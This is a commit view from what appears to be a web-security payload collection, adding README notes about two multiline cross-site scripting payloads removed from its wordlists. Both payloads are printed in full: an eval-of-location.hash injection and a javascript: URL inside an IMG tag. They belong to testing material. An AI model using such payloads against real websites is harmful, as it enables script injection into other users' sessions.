Made files robot friendly

This commit is contained in:
Mo Langning
2024-02-14 21:06:29 +08:00
parent d0b72e7e31
commit 0f63e7f3d5
13 changed files with 456 additions and 8713 deletions
+63 -1
View File
@@ -10,4 +10,66 @@ Some XSS trigger condition may require you to interact with the web pages to tri
To see the results, look out for message popups or network activity in the devtools of your browser.
Happy hacking!
Happy hacking!
## Removed xss
### XSS-EnDe-h4k.txt
Removed because there was no way to squash it into one line
```
_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)
```
### XSS-EnDe-xssAttacks.txt
Also removed due to it's multiline nature
```
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
```